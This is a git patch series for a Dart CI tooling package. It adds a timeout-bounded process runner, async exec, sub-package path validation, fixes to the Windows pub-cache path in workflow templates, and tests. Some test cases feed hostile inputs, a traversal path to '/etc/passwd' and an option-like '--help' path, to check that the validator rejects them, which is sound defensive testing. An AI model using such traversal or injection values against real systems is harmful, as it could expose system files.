import '../../triage/utils/config.dart' show kConfigFileName; import '../manage_cicd_cli.dart'; import '../options/update_all_options.dart'; import '../utils/logger.dart'; +import '../utils/process_runner.dart'; /// Batch-update all packages under a root directory. /// @@ -235,11 +235,14 @@ class UpdateAllCommand extends Command { execArgs = ['run', 'runtime_ci_tooling:manage_cicd', ...args]; } - final result = await Process.run( + final result = await CiProcessRunner.runWithTimeout( executable, execArgs, workingDirectory: pkg.path, - ).timeout(const Duration(minutes: 5), onTimeout: () => ProcessResult(0, 124, '', 'Timed out after 5 minutes')); + timeout: const Duration(minutes: 5), + timeoutExitCode: 124, + timeoutMessage: 'Timed out after 5 minutes', + ); sw.stop(); diff --git a/lib/src/cli/utils/process_runner.dart b/lib/src/cli/utils/process_runner.dart index d15aec0..453a8f7 100644 --- a/lib/src/cli/utils/process_runner.dart +++ b/lib/src/cli/utils/process_runner.dart @@ -1,7 +1,13 @@ +import 'dart:async'; +import 'dart:convert'; import 'dart:io'; +import 'exit_util.dart'; import 'logger.dart'; +/// Maximum bytes to capture per stdout/stderr stream for timeout runs. +const int _kMaxOutputBytes = 32 * 1024; // 32KB + /// Utilities for running external processes. abstract final class CiProcessRunner { /// Patterns that look like tokens/secrets — redact before logging. @@ -45,13 +51,123 @@ abstract final class CiProcessRunner { return output; } - /// Execute a command. Set [fatal] to true to exit on failure. - static void exec(String executable, List args, {String? cwd, bool fatal = false, bool verbose = false}) { + /// Execute a command. Set [fatal] to true to exit on failure (flushes stdout/stderr before exiting). + static Future exec( + String executable, + List args, { + String? 
cwd, + bool fatal = false, + bool verbose = false, + }) async { if (verbose) Logger.info(' \$ ${_redact('$executable ${args.join(" ")}')}'); final result = Process.runSync(executable, args, workingDirectory: cwd); if (result.exitCode != 0) { - Logger.error(' Command failed (exit ${result.exitCode}): ${result.stderr}'); - if (fatal) exit(result.exitCode); + final stderr = _redact((result.stderr as String).trim()); + Logger.error(' Command failed (exit ${result.exitCode}): $stderr'); + if (fatal) await exitWithCode(result.exitCode); + } + } + + /// Runs [executable] with [arguments] and [timeout]. On timeout, kills the + /// process (TERM then KILL on Unix; single kill on Windows) and returns a + /// [ProcessResult] with [timeoutExitCode] and stderr containing [timeoutMessage]. + /// Captures stdout/stderr with bounded buffers ([_kMaxOutputBytes] per stream). + static Future runWithTimeout( + String executable, + List arguments, { + String? workingDirectory, + Duration timeout = const Duration(minutes: 5), + int timeoutExitCode = 124, + String timeoutMessage = 'Timed out', + }) async { + final process = await Process.start(executable, arguments, workingDirectory: workingDirectory); + final stdoutBuf = StringBuffer(); + final stderrBuf = StringBuffer(); + final stdoutBytes = [0]; + final stderrBytes = [0]; + final stdoutTruncated = [false]; + final stderrTruncated = [false]; + const truncationSuffix = '\n\n... 
(output truncated).'; + final truncationBytes = utf8.encode(truncationSuffix).length; + + void capWrite(StringBuffer buf, String data, int maxBytes, List truncated, List byteCount) { + if (truncated[0]) return; + final dataBytes = utf8.encode(data).length; + if (byteCount[0] + dataBytes <= maxBytes) { + buf.write(data); + byteCount[0] += dataBytes; + } else { + final remainingTotal = maxBytes - byteCount[0]; + if (remainingTotal <= truncationBytes) { + truncated[0] = true; + return; + } + final payloadBudget = remainingTotal - truncationBytes; + final bytes = utf8.encode(data); + final toTake = bytes.length > payloadBudget ? payloadBudget : bytes.length; + if (toTake > 0) { + buf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); + byteCount[0] += toTake; + } + buf.write(truncationSuffix); + byteCount[0] += truncationBytes; + truncated[0] = true; + } + } + + final stdoutSub = process.stdout + .transform(Utf8Decoder(allowMalformed: true)) + .listen((data) => capWrite(stdoutBuf, data, _kMaxOutputBytes, stdoutTruncated, stdoutBytes)); + final stderrSub = process.stderr + .transform(Utf8Decoder(allowMalformed: true)) + .listen((data) => capWrite(stderrBuf, data, _kMaxOutputBytes, stderrTruncated, stderrBytes)); + final stdoutDone = stdoutSub.asFuture(); + final stderrDone = stderrSub.asFuture(); + + var exitCode = timeoutExitCode; + var timedOut = false; + try { + exitCode = await process.exitCode.timeout(timeout); + } on TimeoutException { + timedOut = true; + await killAndAwaitExit(process); + } + + try { + await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); + } catch (_) { + // Best-effort drain complete. 
+ } finally { + try { + await Future.wait([stdoutSub.cancel(), stderrSub.cancel()]); + } catch (_) {} + } + + if (timedOut) { + return ProcessResult(process.pid, timeoutExitCode, stdoutBuf.toString(), timeoutMessage); + } + + return ProcessResult(process.pid, exitCode, stdoutBuf.toString(), stderrBuf.toString()); + } + + /// Kills [process] and awaits exit. On Unix: SIGTERM first, wait up to 5s; + /// if still alive, SIGKILL and await. On Windows: single kill, then await. + static Future killAndAwaitExit(Process process) async { + if (Platform.isWindows) { + process.kill(); + try { + await process.exitCode.timeout(const Duration(seconds: 10)); + } on TimeoutException { + // Best-effort on Windows; caller has already timed out. + } + return; + } + process.kill(ProcessSignal.sigterm); + try { + await process.exitCode.timeout(const Duration(seconds: 5)); + } on TimeoutException { + process.kill(ProcessSignal.sigkill); + await process.exitCode; } } } diff --git a/lib/src/cli/utils/sub_package_utils.dart b/lib/src/cli/utils/sub_package_utils.dart index 3de910e..9a7d810 100644 --- a/lib/src/cli/utils/sub_package_utils.dart +++ b/lib/src/cli/utils/sub_package_utils.dart @@ -28,18 +28,20 @@ abstract final class SubPackageUtils { if (ciConfig == null) return []; final raw = ciConfig['sub_packages'] as List?; if (raw == null || raw.isEmpty) return []; - return raw - .whereType>() - .where((sp) => sp['name'] != null && sp['path'] != null) - .map( - (sp) => { - ...sp, - // Normalize: strip trailing slashes to avoid double-slash paths - // in downstream consumers (git commands, Markdown, etc.). - 'path': (sp['path'] as String).replaceAll(RegExp(r'/+$'), ''), - }, - ) - .toList(); + final seenNames = {}; + final seenPaths = {}; + final result = >[]; + for (final item in raw) { + if (item is! 
Map) continue; + if (item['name'] == null || item['path'] == null) continue; + final err = WorkflowGenerator.validateSubPackageEntry(item, seenNames, seenPaths); + if (err != null) { + Logger.warn('Skipping invalid sub-package "${item['name']}": $err'); + continue; + } + result.add({...item, 'path': (item['path'] as String).replaceAll(RegExp(r'/+$'), '')}); + } + return result; } /// Build a per-package diff summary suitable for appending to a Gemini prompt. diff --git a/lib/src/cli/utils/tool_installers.dart b/lib/src/cli/utils/tool_installers.dart index f6678f2..36489e9 100644 --- a/lib/src/cli/utils/tool_installers.dart +++ b/lib/src/cli/utils/tool_installers.dart @@ -36,17 +36,17 @@ abstract final class ToolInstallers { static Future installNodeJs() async { if (Platform.isMacOS) { Logger.info('Installing Node.js via Homebrew...'); - CiProcessRunner.exec('brew', ['install', 'node']); + await CiProcessRunner.exec('brew', ['install', 'node']); } else if (Platform.isLinux) { Logger.info('Installing Node.js via apt...'); - CiProcessRunner.exec('sudo', ['apt', 'install', '-y', 'nodejs', 'npm']); + await CiProcessRunner.exec('sudo', ['apt', 'install', '-y', 'nodejs', 'npm']); } else if (Platform.isWindows) { if (CiProcessRunner.commandExists('winget')) { Logger.info('Installing Node.js via winget...'); - CiProcessRunner.exec('winget', ['install', 'OpenJS.NodeJS']); + await CiProcessRunner.exec('winget', ['install', 'OpenJS.NodeJS']); } else if (CiProcessRunner.commandExists('choco')) { Logger.info('Installing Node.js via Chocolatey...'); - CiProcessRunner.exec('choco', ['install', 'nodejs', '-y']); + await CiProcessRunner.exec('choco', ['install', 'nodejs', '-y']); } else { Logger.error('Install Node.js manually: https://nodejs.org/'); } @@ -59,16 +59,16 @@ abstract final class ToolInstallers { return; } Logger.info('Installing Gemini CLI via npm...'); - CiProcessRunner.exec('npm', ['install', '-g', '@google/gemini-cli@latest']); + await CiProcessRunner.exec('npm', 
['install', '-g', '@google/gemini-cli@latest']); } static Future installGitHubCli() async { if (Platform.isMacOS) { Logger.info('Installing GitHub CLI via Homebrew...'); - CiProcessRunner.exec('brew', ['install', 'gh']); + await CiProcessRunner.exec('brew', ['install', 'gh']); } else if (Platform.isLinux) { Logger.info('Installing GitHub CLI via apt...'); - CiProcessRunner.exec('sh', [ + await CiProcessRunner.exec('sh', [ '-c', 'type -p curl >/dev/null || sudo apt install curl -y && ' 'curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | ' @@ -79,32 +79,32 @@ abstract final class ToolInstallers { ]); } else if (Platform.isWindows) { if (CiProcessRunner.commandExists('winget')) { - CiProcessRunner.exec('winget', ['install', 'GitHub.cli']); + await CiProcessRunner.exec('winget', ['install', 'GitHub.cli']); } else if (CiProcessRunner.commandExists('choco')) { - CiProcessRunner.exec('choco', ['install', 'gh', '-y']); + await CiProcessRunner.exec('choco', ['install', 'gh', '-y']); } } } static Future installJq() async { if (Platform.isMacOS) { - CiProcessRunner.exec('brew', ['install', 'jq']); + await CiProcessRunner.exec('brew', ['install', 'jq']); } else if (Platform.isLinux) { - CiProcessRunner.exec('sudo', ['apt', 'install', '-y', 'jq']); + await CiProcessRunner.exec('sudo', ['apt', 'install', '-y', 'jq']); } else if (Platform.isWindows) { if (CiProcessRunner.commandExists('winget')) { - CiProcessRunner.exec('winget', ['install', 'jqlang.jq']); + await CiProcessRunner.exec('winget', ['install', 'jqlang.jq']); } else if (CiProcessRunner.commandExists('choco')) { - CiProcessRunner.exec('choco', ['install', 'jq', '-y']); + await CiProcessRunner.exec('choco', ['install', 'jq', '-y']); } } } static Future installTree() async { if (Platform.isMacOS) { - CiProcessRunner.exec('brew', ['install', 'tree']); + await CiProcessRunner.exec('brew', ['install', 'tree']); } else if (Platform.isLinux) { - CiProcessRunner.exec('sudo', ['apt', 'install', '-y', 
'tree']); + await CiProcessRunner.exec('sudo', ['apt', 'install', '-y', 'tree']); } else if (Platform.isWindows) { Logger.info('tree is built-in on Windows (limited). For full tree: choco install tree'); } diff --git a/lib/src/cli/utils/workflow_generator.dart b/lib/src/cli/utils/workflow_generator.dart index 583881a..18195f8 100644 --- a/lib/src/cli/utils/workflow_generator.dart +++ b/lib/src/cli/utils/workflow_generator.dart @@ -94,6 +94,39 @@ class WorkflowGenerator { WorkflowGenerator({required this.ciConfig, required this.toolingVersion}); + /// Validates a single sub-package entry. Returns null if valid, otherwise error message. + /// Mutates [seenNames] and [seenPaths] only when valid. Used by [SubPackageUtils.loadSubPackages]. + static String? validateSubPackageEntry(Map sp, Set seenNames, Set seenPaths) { + final name = sp['name']; + final pathValue = sp['path']; + + if (name is! String || name.trim().isEmpty) return 'name must be a non-empty string'; + if (name != name.trim()) return 'name must not have leading/trailing whitespace'; + if (!_isSafeSubPackageName(name)) return 'name contains unsupported characters: "$name"'; + + if (pathValue is! 
String || pathValue.trim().isEmpty) return 'path must be a non-empty string'; + if (pathValue != pathValue.trim()) return 'path must not have leading/trailing whitespace'; + if (pathValue.contains(RegExp(r'[\r\n\t]'))) return 'path must not contain newlines/tabs'; + if (p.isAbsolute(pathValue) || pathValue.startsWith('~')) { + return 'path must be a relative repo path'; + } + if (pathValue.contains('\\')) return 'path must use forward slashes (/)'; + final normalized = p.posix.normalize(pathValue); + if (normalized.startsWith('..') || normalized.contains('/../')) { + return 'path must not traverse outside the repo'; + } + if (normalized == '.') return 'path must not be repo root (".")'; + if (normalized.startsWith('-')) { + return 'path must not start with "-" (reserved for CLI options)'; + } + if (RegExp(r'[^A-Za-z0-9_./-]').hasMatch(pathValue)) { + return 'path contains unsupported characters: "$pathValue"'; + } + if (!seenNames.add(name)) return 'duplicate name "$name"'; + if (!seenPaths.add(normalized)) return 'duplicate path "$normalized"'; + return null; + } + /// Returns the web_test config map if present and valid; otherwise null. static Map? 
_getWebTestConfig(Map ciConfig) { final raw = ciConfig['web_test']; diff --git a/templates/github/workflows/issue-triage.template.yaml b/templates/github/workflows/issue-triage.template.yaml index f632fc7..770bd69 100644 --- a/templates/github/workflows/issue-triage.template.yaml +++ b/templates/github/workflows/issue-triage.template.yaml @@ -67,7 +67,7 @@ jobs: if: steps.trigger.outputs.run == 'true' uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -80,6 +80,7 @@ jobs: node-version: "22" - run: npm install -g @google/gemini-cli@latest + if: steps.trigger.outputs.run == 'true' - name: Cache Go modules (GitHub MCP server) if: steps.trigger.outputs.run == 'true' diff --git a/templates/github/workflows/release.template.yaml b/templates/github/workflows/release.template.yaml index c13875b..78511ad 100644 --- a/templates/github/workflows/release.template.yaml +++ b/templates/github/workflows/release.template.yaml @@ -84,7 +84,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -158,7 +158,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} 
restore-keys: ${{ runner.os }}-dart-pub- @@ -242,7 +242,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -333,7 +333,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -438,7 +438,7 @@ jobs: - name: Cache Dart pub uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-pub-${{ hashFiles('**/pubspec.lock') }} restore-keys: ${{ runner.os }}-pub- @@ -538,7 +538,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -679,7 +679,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ 
hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -805,7 +805,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} + path: ${{ runner.os == 'Windows' && format('{0}\\Pub\\Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- diff --git a/test/cli_utils_test.dart b/test/cli_utils_test.dart index cf7d915..79047f6 100644 --- a/test/cli_utils_test.dart +++ b/test/cli_utils_test.dart @@ -1,10 +1,13 @@ +import 'dart:convert'; import 'dart:io'; import 'package:path/path.dart' as p; import 'package:test/test.dart' hide TestFailure; +import 'package:runtime_ci_tooling/src/cli/utils/process_runner.dart'; import 'package:runtime_ci_tooling/src/cli/utils/repo_utils.dart'; import 'package:runtime_ci_tooling/src/cli/utils/step_summary.dart'; +import 'package:runtime_ci_tooling/src/cli/utils/sub_package_utils.dart'; import 'package:runtime_ci_tooling/src/cli/utils/test_results_util.dart'; bool _canCreateSymlink() { @@ -43,7 +46,10 @@ void main() { }); test('returns default path when TEST_LOG_DIR is unset', () { - final resolved = RepoUtils.resolveTestLogDir(repoRoot, environment: const {}); + final resolved = RepoUtils.resolveTestLogDir( + repoRoot, + environment: const {}, + ); expect(resolved, equals(p.join(repoRoot, '.dart_tool', 'test-logs'))); }); @@ -67,8 +73,10 @@ void main() { test('throws when TEST_LOG_DIR is relative', () { expect( - () => - RepoUtils.resolveTestLogDir(repoRoot, environment: const {'TEST_LOG_DIR': 'relative/path'}), + () => RepoUtils.resolveTestLogDir( + repoRoot, + environment: const {'TEST_LOG_DIR': 'relative/path'}, + ), throwsA(isA()), ); }); @@ -77,7 +85,10 @@ void main() { final runnerTemp = p.join(repoRoot, 'runner-temp'); final outside = p.join(repoRoot, 'outside', 'logs'); expect( - () => 
RepoUtils.resolveTestLogDir(repoRoot, environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}), + () => RepoUtils.resolveTestLogDir( + repoRoot, + environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}, + ), throwsA(isA()), ); }); @@ -126,19 +137,35 @@ void main() { expect(File(filePath).readAsStringSync(), equals('hello world')); }); - test('ensureSafeDirectory rejects symlink-backed directories', skip: !symlinksSupported, () { - final targetDir = Directory(p.join(tempDir.path, 'target'))..createSync(recursive: true); - final linkDirPath = p.join(tempDir.path, 'linked'); - Link(linkDirPath).createSync(targetDir.path); - expect(() => RepoUtils.ensureSafeDirectory(linkDirPath), throwsA(isA())); - }); - - test('writeFileSafely rejects symlink file targets', skip: !symlinksSupported, () { - final targetFile = File(p.join(tempDir.path, 'target.txt'))..writeAsStringSync('base'); - final linkPath = p.join(tempDir.path, 'linked.txt'); - Link(linkPath).createSync(targetFile.path); - expect(() => RepoUtils.writeFileSafely(linkPath, 'new content'), throwsA(isA())); - }); + test( + 'ensureSafeDirectory rejects symlink-backed directories', + skip: !symlinksSupported, + () { + final targetDir = Directory(p.join(tempDir.path, 'target')) + ..createSync(recursive: true); + final linkDirPath = p.join(tempDir.path, 'linked'); + Link(linkDirPath).createSync(targetDir.path); + expect( + () => RepoUtils.ensureSafeDirectory(linkDirPath), + throwsA(isA()), + ); + }, + ); + + test( + 'writeFileSafely rejects symlink file targets', + skip: !symlinksSupported, + () { + final targetFile = File(p.join(tempDir.path, 'target.txt')) + ..writeAsStringSync('base'); + final linkPath = p.join(tempDir.path, 'linked.txt'); + Link(linkPath).createSync(targetFile.path); + expect( + () => RepoUtils.writeFileSafely(linkPath, 'new content'), + throwsA(isA()), + ); + }, + ); }); group('TestResultsUtil.parseTestResultsJson', () { @@ -186,16 +213,21 @@ void main() { 
expect(results.failures, isEmpty); }); - test('returns unparsed results when file has valid JSON but no structured events', () { - final jsonPath = p.join(tempDir.path, 'no_events.json'); - File(jsonPath).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isFalse); - expect(results.passed, equals(0)); - expect(results.failed, equals(0)); - expect(results.skipped, equals(0)); - expect(results.failures, isEmpty); - }); + test( + 'returns unparsed results when file has valid JSON but no structured events', + () { + final jsonPath = p.join(tempDir.path, 'no_events.json'); + File( + jsonPath, + ).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); + final results = TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isFalse); + expect(results.passed, equals(0)); + expect(results.failed, equals(0)); + expect(results.skipped, equals(0)); + expect(results.failures, isEmpty); + }, + ); test('parses pass/fail/skipped counts and failure details', () { final jsonPath = p.join(tempDir.path, 'results.json'); @@ -307,7 +339,12 @@ void main() { }); group('TestResultsUtil.writeTestJobSummary', () { - TestResults _parsed({required int passed, required int failed, required int skipped, int durationMs = 500}) { + TestResults _parsed({ + required int passed, + required int failed, + required int skipped, + int durationMs = 500, + }) { final results = TestResults() ..parsed = true ..passed = passed @@ -317,39 +354,50 @@ void main() { return results; } - test('emits NOTE when parsed results are successful and exit code is 0', () { - String? 
summary; - final results = _parsed(passed: 3, failed: 0, skipped: 1); - - TestResultsUtil.writeTestJobSummary( - results, - 0, - platformId: 'linux-x64', - writeSummary: (markdown) => summary = markdown, - ); - - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux-x64')); - expect(summary!, contains('> [!NOTE]')); - expect(summary!, contains('All 4 tests passed')); - }); - - test('emits CAUTION when exit code is non-zero even if failed count is zero', () { - String? summary; - final results = _parsed(passed: 2, failed: 0, skipped: 0); + test( + 'emits NOTE when parsed results are successful and exit code is 0', + () { + String? summary; + final results = _parsed(passed: 3, failed: 0, skipped: 1); + + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'linux-x64', + writeSummary: (markdown) => summary = markdown, + ); - TestResultsUtil.writeTestJobSummary( - results, - 1, - platformId: 'linux ', - writeSummary: (markdown) => summary = markdown, - ); + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux-x64')); + expect(summary!, contains('> [!NOTE]')); + expect(summary!, contains('All 4 tests passed')); + }, + ); + + test( + 'emits CAUTION when exit code is non-zero even if failed count is zero', + () { + String? 
summary; + final results = _parsed(passed: 2, failed: 0, skipped: 0); + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux ', + writeSummary: (markdown) => summary = markdown, + ); - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux <x64>')); - expect(summary!, contains('> [!CAUTION]')); - expect(summary!, contains('Tests exited with code 1 despite no structured test failures.')); - }); + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux <x64>')); + expect(summary!, contains('> [!CAUTION]')); + expect( + summary!, + contains( + 'Tests exited with code 1 despite no structured test failures.', + ), + ); + }, + ); test('emits CAUTION for unparsed results with non-zero exit code', () { String? summary; @@ -364,7 +412,12 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!CAUTION]')); - expect(summary!, contains('Tests failed (exit code 7) — no structured results available.')); + expect( + summary!, + contains( + 'Tests failed (exit code 7) — no structured results available.', + ), + ); }); test('emits NOTE for unparsed results with zero exit code', () { @@ -380,14 +433,25 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!NOTE]')); - expect(summary!, contains('Tests passed (exit code 0) — no structured results available.')); + expect( + summary!, + contains( + 'Tests passed (exit code 0) — no structured results available.', + ), + ); }); test('emits CAUTION when parsed results contain failures', () { String? 
summary; final results = _parsed(passed: 1, failed: 1, skipped: 0); results.failures.add( - TestFailure(name: 'failing test', error: 'boom', stackTrace: 'trace', printOutput: '', durationMs: 12), + TestFailure( + name: 'failing test', + error: 'boom', + stackTrace: 'trace', + printOutput: '', + durationMs: 12, + ), ); TestResultsUtil.writeTestJobSummary( @@ -427,7 +491,12 @@ void main() { ); expect(summary, isNotNull); - expect(summary!, contains('_...and 5 more failures. See test logs artifact for full details._')); + expect( + summary!, + contains( + '_...and 5 more failures. See test logs artifact for full details._', + ), + ); expect(summary!, isNot(contains('failing test 24'))); }); @@ -500,7 +569,10 @@ void main() { File(summaryPath).writeAsStringSync('x' * (maxBytes - 2)); expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); - StepSummary.write('語', environment: {'GITHUB_STEP_SUMMARY': summaryPath}); + StepSummary.write( + '語', + environment: {'GITHUB_STEP_SUMMARY': summaryPath}, + ); // Should skip append (would exceed); file size unchanged expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); } finally { @@ -522,4 +594,157 @@ void main() { expect(out, contains('')); }); }); + + group('SubPackageUtils.loadSubPackages', () { + late Directory tempDir; + + setUp(() { + tempDir = Directory.systemTemp.createTempSync('sub_pkg_load_'); + }); + + tearDown(() { + if (tempDir.existsSync()) tempDir.deleteSync(recursive: true); + }); + + void _writeConfig(Map ci) { + final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); + File( + '${configDir.path}/config.json', + ).writeAsStringSync(json.encode({'ci': ci})); + } + + test('returns empty when no sub_packages', () { + _writeConfig({'dart_sdk': '3.9.2', 'features': {}}); + expect(SubPackageUtils.loadSubPackages(tempDir.path), isEmpty); + }); + + test('valid sub-packages pass through', () { + _writeConfig({ + 'dart_sdk': '3.9.2', + 'features': {}, + 'sub_packages': [ + {'name': 'core', 
'path': 'packages/core'}, + {'name': 'api', 'path': 'packages/api'}, + ], + }); + final result = SubPackageUtils.loadSubPackages(tempDir.path); + expect(result.length, equals(2)); + expect(result[0]['name'], equals('core')); + expect(result[0]['path'], equals('packages/core')); + expect(result[1]['name'], equals('api')); + expect(result[1]['path'], equals('packages/api')); + }); + + test('skips invalid name (unsupported chars)', () { + _writeConfig({ + 'dart_sdk': '3.9.2', + 'features': {}, + 'sub_packages': [ + {'name': 'foo bar', 'path': 'packages/foo'}, + ], + }); + final result = SubPackageUtils.loadSubPackages(tempDir.path); + expect(result, isEmpty); + }); + + test('skips invalid path (traversal)', () { + _writeConfig({ + 'dart_sdk': '3.9.2', + 'features': {}, + 'sub_packages': [ + {'name': 'evil', 'path': '../../../etc/passwd'}, + ], + }); + final result = SubPackageUtils.loadSubPackages(tempDir.path); + expect(result, isEmpty); + }); + + test('skips invalid path (absolute)', () { + _writeConfig({ + 'dart_sdk': '3.9.2', + 'features': {}, + 'sub_packages': [ + {'name': 'foo', 'path': '/usr/local'}, + ], + }); + final result = SubPackageUtils.loadSubPackages(tempDir.path); + expect(result, isEmpty); + }); + + test('skips invalid path (leading dash)', () { + _writeConfig({ + 'dart_sdk': '3.9.2', + 'features': {}, + 'sub_packages': [ + {'name': 'foo', 'path': '--help'}, + ], + }); + final result = SubPackageUtils.loadSubPackages(tempDir.path); + expect(result, isEmpty); + }); + + test('valid entries pass when mixed with invalid', () { + _writeConfig({ + 'dart_sdk': '3.9.2', + 'features': {}, + 'sub_packages': [ + {'name': 'bad', 'path': '../../../etc'}, + {'name': 'good', 'path': 'packages/good'}, + ], + }); + final result = SubPackageUtils.loadSubPackages(tempDir.path); + expect(result.length, equals(1)); + expect(result[0]['name'], equals('good')); + expect(result[0]['path'], equals('packages/good')); + }); + }); + + group('CiProcessRunner.exec', () { + 
test('fatal path exits with process exit code after flushing stdout/stderr', + () async { + final scriptPath = p.join( + p.current, + 'test', + 'scripts', + 'fatal_exit_probe.dart', + ); + final result = Process.runSync( + Platform.resolvedExecutable, + ['run', scriptPath], + runInShell: false, + ); + final expectedCode = Platform.isWindows ? 7 : 1; + expect(result.exitCode, equals(expectedCode), + reason: 'fatal exec should exit with failing command exit code'); + }); + }); + + group('CiProcessRunner.runWithTimeout', () { + test('completes normally when process finishes within timeout', () async { + final result = await CiProcessRunner.runWithTimeout( + Platform.resolvedExecutable, + ['--version'], + timeout: const Duration(seconds: 10), + ); + expect(result.exitCode, equals(0)); + expect(result.stdout, contains('Dart')); + }); + + test( + 'returns timeout result and kills process when timeout exceeded', + () async { + final executable = Platform.isWindows ? 'ping' : 'sleep'; + final args = Platform.isWindows ? ['127.0.0.1', '-n', '60'] : ['60']; + final result = await CiProcessRunner.runWithTimeout( + executable, + args, + timeout: const Duration(milliseconds: 500), + timeoutExitCode: 124, + timeoutMessage: 'Timed out', + ); + expect(result.exitCode, equals(124)); + expect(result.stderr, equals('Timed out')); + }, + ); + }); } diff --git a/test/scripts/fatal_exit_probe.dart b/test/scripts/fatal_exit_probe.dart new file mode 100644 index 0000000..ff9a9b0 --- /dev/null +++ b/test/scripts/fatal_exit_probe.dart @@ -0,0 +1,14 @@ +// Probe script for testing CiProcessRunner.exec with fatal=true. +// Run: dart run test/scripts/fatal_exit_probe.dart +// Expected: exits with code 1 (or 7 on Windows when using exit 7). 
+import 'dart:io'; + +import 'package:runtime_ci_tooling/src/cli/utils/process_runner.dart'; + +Future main() async { + if (Platform.isWindows) { + await CiProcessRunner.exec('cmd', ['/c', 'exit', '7'], fatal: true); + } else { + await CiProcessRunner.exec('false', [], fatal: true); + } +} From 261466cf443e8dcd69c5743072ccfc3eb96e6cfd Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 22:17:08 -0500 Subject: [PATCH 13/16] fix: standardize Windows pub-cache paths, make artifact retention configurable, update docs MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Fix Windows pub-cache path in ci.skeleton.yaml: forward slashes → backslashes to match release/triage templates and Dart's default %LOCALAPPDATA%\Pub\Cache - Make artifact_retention_days configurable via ci config (1-90, default 7) with full validation matching line_length pattern - Extract Utf8BoundedBuffer utility for testable byte-bounded stream capture - Extract _resolveLogDirOrExit to eliminate late-final fragility - Update API_REFERENCE.md with all new public 